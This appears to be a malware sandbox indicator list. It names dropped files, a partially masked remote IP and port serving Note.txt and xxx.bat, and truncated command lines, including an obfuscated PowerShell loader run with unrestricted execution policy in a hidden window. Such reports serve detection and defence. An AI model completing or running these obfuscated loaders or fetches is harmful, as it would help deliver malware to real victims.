Technical Information
- %APPDATA%\note.txt
- %APPDATA%\xxx.bat
- '19#.#22.96.41':7287
- http://19#.##2.96.41:7287/Note.txt via 19#.#22.96.41
- http://19#.##2.96.41:7287/xxx.bat via 19#.#22.96.41
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function dBZLgjLDIqleQ($NchhTIVg, $wOJbYsvoYuxf){[IO.File]::WriteAllBytes($NchhTIVg, $wOJbYsvoYuxf)};function PsUDyWJcEapzJBPP($NchhTIVg){if($NchhTIVg.EndsWith((lP...' (with hidden window)
- '%WINDIR%\syswow64\notepad.exe' %APPDATA%\Note.txt
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\xxx.bat" "
- '%WINDIR%\syswow64\cmd.exe' /K "%APPDATA%\xxx.bat"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo $host.UI.RawUI.WindowTitle='%APPDATA%\xxx.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe'